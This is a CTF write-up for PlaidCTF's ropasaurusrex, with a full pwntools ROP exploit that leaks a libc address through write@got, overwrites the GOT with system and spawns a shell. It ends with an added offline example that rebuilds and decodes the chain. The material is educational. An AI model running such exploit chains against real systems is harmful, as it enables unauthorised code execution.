PlaidCTF pwnable_ropasaurusrex Write up

This is a typical 32-bit ROP challenge.

The attack scenario: leak a libc address (here, the resolved write entry in the GOT), use the known offsets inside that libc to compute the address of system, then call it. The binary does not give us a pointer for free, so the leak has to be done by the first stage of the ROP chain itself.

The binary imports read and write, which is all we need: write leaks the GOT entry, read lets us plant "/bin/sh" and overwrite the GOT, and the textbook ROP chain does the rest.

from pwn import *
#context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

p = process("./ropasaurusrex")
binf = ELF("./ropasaurusrex")

#gdb.attach(p)

write_plt = binf.plt['write']
write_got = binf.got['write']
read_plt = binf.plt['read']
read_got = binf.got['read']
bss = binf.bss()

# pop ebx; pop esi; pop edi; ret -- pops three arguments off the stack between calls
pppr_gadget = 0x080484b6

# Offsets of write() and system() inside the target's libc. They are specific to
# the libc build used here; recompute them for another libc (e.g. ELF('libc.so.6').symbols).
write_offset = 0xbd630
system_offset = 0x22860

# 136-byte buffer + saved ebp = 140 bytes to reach the saved return address
payload = b"A"*140

# 1) write(1, &write@got, 4): leak the resolved libc address of write
payload += p32(write_plt)
payload += p32(pppr_gadget)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)

# 2) read(0, bss, 8): store "/bin/sh\0" in .bss (writable, fixed address)
payload += p32(read_plt)
payload += p32(pppr_gadget)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

# 3) read(0, &write@got, 4): overwrite write's GOT entry with the address of system
payload += p32(read_plt)
payload += p32(pppr_gadget)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

# 4) write@plt now jumps to system; fake return address, then the argument
payload += p32(write_plt)
payload += b"A"*4
payload += p32(bss)

p.send(payload)
leak = u32(p.recvn(4))          # recvn: a plain recv(4) may return fewer than 4 bytes

addr_libc_base = leak - write_offset
addr_libc_system = addr_libc_base + system_offset

log.info("leak address: " + hex(leak))
log.info("libc base: " + hex(addr_libc_base))
log.info("libc_system: " + hex(addr_libc_system))

# Each read() above asks for an exact byte count, so the two stage-2 inputs can be sent separately
p.send(b"/bin/sh\x00")
p.send(p32(addr_libc_system))

p.interactive()

Exploiting it this way drops a shell.
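As an added example (not part of the original write-up, and written without pwntools so it runs offline): the same three-stage chain built with struct, plus two checks worth running before sending anything. First, the libc base computed from the leak must be page-aligned; a base with its low 12 bits set means the write/system offsets belong to a different libc than the one the target loaded. Second, a decoder that walks the chain the way ret would and lists the calls it will make, so the layout can be verified as a dry run. The PLT/GOT/.bss addresses below are constructed sample values in the style of a non-PIE 32-bit binary (the real ones come from ELF('./ropasaurusrex')); the gadget address, the 140-byte distance to the return address and the libc offsets are those from the write-up.

```python
import struct

# Sample addresses, constructed for this example (hypothetical values in the
# style of a 32-bit non-PIE binary; the real ones come from ELF('./ropasaurusrex')).
WRITE_PLT = 0x0804830c
READ_PLT = 0x0804832c
WRITE_GOT = 0x0804961c
BSS = 0x08049628
PPPR = 0x080484b6        # pop ebx; pop esi; pop edi; ret (gadget from the write-up)
RET_OFFSET = 140         # bytes from buffer start to the saved return address
WRITE_OFFSET = 0xbd630   # libc offsets from the write-up (specific to that libc build)
SYSTEM_OFFSET = 0x22860


def p32(v):
    return struct.pack("<I", v & 0xffffffff)


def u32(b):
    return struct.unpack("<I", b[:4])[0]


def libc_base(leak, func_offset):
    """Turn a leaked GOT entry into the libc load address and sanity-check it.
    libc is mmap'ed at a page boundary, so low bits in the base mean the
    offset does not belong to the libc the target is actually running."""
    base = leak - func_offset
    if base & 0xfff:
        raise ValueError("libc base 0x%x is not page-aligned: wrong libc offsets?" % base)
    return base


def rop_call(func, args, pppr=PPPR):
    """One call in a 32-bit chain: target, then the gadget that pops the
    arguments so the next entry is reached by ret. Only the 3-pop gadget is
    modelled, so every call takes exactly three arguments (pad with 0)."""
    if len(args) != 3:
        raise ValueError("pppr gadget needs exactly 3 argument slots")
    return p32(func) + p32(pppr) + b"".join(p32(a) for a in args)


def build_stage1():
    """Padding + leak write@got, read "/bin/sh" into .bss, overwrite write@got,
    then call write@plt (now system) with .bss as the argument."""
    chain = b"A" * RET_OFFSET
    chain += rop_call(WRITE_PLT, [1, WRITE_GOT, 4])
    chain += rop_call(READ_PLT, [0, BSS, 8])
    chain += rop_call(READ_PLT, [0, WRITE_GOT, 4])
    chain += p32(WRITE_PLT) + b"JUNK" + p32(BSS)   # fake return address, then argv
    return chain


def build_stage2(leak):
    """The two inputs consumed by the read() calls in stage 1."""
    system = libc_base(leak, WRITE_OFFSET) + SYSTEM_OFFSET
    return b"/bin/sh\x00", p32(system)


def decode_chain(chain, pppr=PPPR):
    """Dry run: walk the words after the padding as ret would and return
    [(target, args)]. A call followed by the pppr gadget takes 3 args; the
    final call (no gadget) has a fake return slot and a single argument."""
    words = [u32(chain[i:i + 4]) for i in range(RET_OFFSET, len(chain), 4)]
    calls, i = [], 0
    while i < len(words):
        target = words[i]
        if i + 1 < len(words) and words[i + 1] == pppr:
            calls.append((target, tuple(words[i + 2:i + 5])))
            i += 5
        else:
            calls.append((target, tuple(words[i + 2:i + 3])))
            i += 3
    return calls


if __name__ == "__main__":
    for target, args in decode_chain(build_stage1()):
        print("call 0x%08x%s" % (target, args))
    # constructed leak value, as if write@got had been printed by stage 1
    print(build_stage2(0xf7e2f630))
```

The decoder is deliberately strict about the one gadget the chain uses: if a call is missing its pppr entry, the following words are misread as a target and the printed call list shows it immediately, which is cheaper than debugging a crashed process.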
